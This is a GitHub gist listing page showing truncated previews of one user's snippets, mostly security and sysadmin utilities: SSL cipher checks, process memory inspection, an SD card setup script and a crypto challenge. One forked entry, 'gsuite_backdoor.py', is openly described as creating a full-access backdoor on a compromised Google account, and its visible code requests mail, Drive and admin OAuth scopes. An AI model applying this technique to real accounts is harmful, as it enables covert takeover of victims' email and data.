Oneiroi
/ MPB_POODLE_MYSQL_CIPHERCHECK.sh
Last active
August 29, 2015 14:07
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| mysql -se "SHOW STATUS LIKE 'Ssl_cipher_list'" | sed 's/:/\n/g' | sed 's/Ssl_cipher_list\s//g' | while read sspec; do SPEC=`openssl ciphers -v "$sspec" 2>/dev/null | grep -v SSLv3 | awk '{print $1}'`; [[ "$sspec" == "$SPEC" ]] && mysql --ssl-cipher=$sspec -e QUIT 2>/dev/null && echo "$sspec OK"; done |
Oneiroi
/ find-libc-in-memory-of-processes-run-as-root.py
Last active
August 29, 2015 14:14
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import os, glob, re | |
| def main(): | |
| p = re.compile('^([0-9a-f]+-[0-9a-f]+)\s[a-z\-]{4}\s[0-9a-f]{8}\s[a-z0-9]{2}\:[a-z0-9]{2}\s[0-9]+\s+(.*)$') | |
| smaps = glob.glob('/proc/[0-9]*/smaps') | |
| for smap in smaps: | |
| lines = open(smap).readlines() | |
| for line in lines: | |
| m = p.match(line) | |
| if m and 'libc' in line: | |
| name = open(smap.replace('smaps','status')).readlines()[0] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh -e | |
| # | |
| # rc.local | |
| # | |
| # This script is executed at the end of each multiuser runlevel. | |
| # Make sure that the script will "exit 0" on success or any other | |
| # value on error. | |
| # | |
| # In order to enable or disable this script just change the execution | |
| # bits. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| openssl s_client -cipher EXPORT -connect domain.com:443 < /dev/null 2>/dev/null | grep SSL-Session | wc -l |
Oneiroi
/ rpi2_cluster_prep_sdcard.sh
Created
May 25, 2015 10:23
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # ensure CWD contains dirs root and boot | |
| # ensure sd card has not automounted elsewhere | |
| # ensure ArchARM-rpi2.tgz exists in CWD | |
| # ensure partitions configured as per: http://archlinuxarm.org/platforms/armv7/broadcom/raspberry-pi-2 | |
| # | |
| mkfs.vfat /dev/mmcblk0p1 && \ | |
| mount /dev/mmcblk0p1 ./boot && \ | |
| mkfs.ext4 /dev/mmcblk0p2 && \ | |
| mount /dev/mmcblk0p2 ./root && \ |
Oneiroi
/ This is how you watch for a pre-order
Created
July 3, 2015 09:12
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| while true; do curl -H'User-agent: AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.125 Safari/537.36' -s 'http://www.game.co.uk/webapp/wcs/stores/servlet/HubArticleView?hubId=639265&articleId=639266&catalogId=10201&langId=44&storeId=10151&&cm_mmc=Facebook-_-Digital-_-Fallout4-_-Link#NaN' | grep 'Check back later today' || chromium https://www.youtube.com/watch?v=H91rPIq2mN4; sleep 10; done |
Oneiroi
/ gist:099fc426cc468887994d45f21a6d978a
Created
January 20, 2017 11:33
https://zerobin.net/?06dae5d45335d2b4#m8FRD5qfMgH1rxjVH4oAjHvOMxJArCGp9UIogpmsnHg=
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Mirror of https://zerobin.net/?06dae5d45335d2b4#m8FRD5qfMgH1rxjVH4oAjHvOMxJArCGp9UIogpmsnHg= (Since remove) | |
| Pulled from https://archive.fo/5Vbc9 | |
| Reddit thread https://www.reddit.com/r/netsec/comments/5mw510/discussion_of_a_new_potential_exploit_for_openssl/ | |
| Original text now follows: | |
| I'm glad more people are in here now. It gets much, much worse than this. | |
| The post below literally says "if you have the password, you can generate the key and open the file. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| OS=`uname` | |
| URL44CON="https://44con.com/44con/44con-2018/44con-2018-schedule/" | |
| #SET this to rickroll or w/e just make sure your speakers are on full volume | |
| YTALERT="https://www.youtube.com/watch?v=H91rPIq2mN4" | |
| if [ "Darwin" == "${OS}" ]; then | |
| BROWSER="open"; | |
| elif [ "Linux" == "${OS}" ]; then |
Oneiroi
/ gsuite_backdoor.py
Created
November 2, 2017 13:45
— forked from ustayready/gsuite_backdoor.py
Quickly create a full-access backdoor on Google accounts by creating a Google API project at https://cloud.google.com/console, save the client_secrets.json into the same folder and then run the script below. It will print a URL for you to access with a browser that has the compromised Google account session active so you can authorize the applic…
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import os | |
| from oauth2client import client, tools | |
| from oauth2client.file import Storage | |
| SCOPES = 'https://www.googleapis.com/auth/calendar https://mail.google.com/ https://www.googleapis.com/auth/drive https://www.googleapis.com/auth/groups https://www.googleapis.com/auth/admin.directory.user' | |
| def get_credentials(): | |
| credential_dir =os.getcwd() | |
| client_secret_path = os.path.join(credential_dir, 'client_secrets.json') |
Oneiroi
/ Unsolved crypto challenge since 2015-11-26
Last active
December 4, 2017 10:29
This crypto challenege of my own devising has gone unsolved since I created it on 2015-11-26, can you recover the flag ?
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 596f7527766520676f7420736f6d6520776f726b206168656164206f6620796f753a20546d56346443427a644756774f6941304d545a6a4e6d51325a6a637a4e7a51794d4463304e6a67324e5463794e6a557a595449774e4745304e6a55304e444d304d544d324e474d314d44526d4e5455314d5451334e4463314f54526a4e4759304e5451794e5745304e7a52694e546b30597a51314e4455304d6a4d794e4463314d544d794e474d314e4451324e5445314d5451314e544d304f5451304e5467305a5451324e5463304e7a55354e446b304e44517a4e4759314e6a4d304e544d304d544d324e474d314d44526d4e5455314d5451334e444d304f5451304e5445305a5451324e5467304f4451354e446b304e4455794e4759314e6a55344e5467304f5456684e4745304d54526b4e4755314f4455334e446b31595452684d7a49304e5451784e5745304e4451784e475130595455324e4463304e5455354e5451304e54526c4e5449305a5452684e4449304d5455324e4463314d7a51794e475530596a4d314e4749304e54526b4d32517a5a444e6b |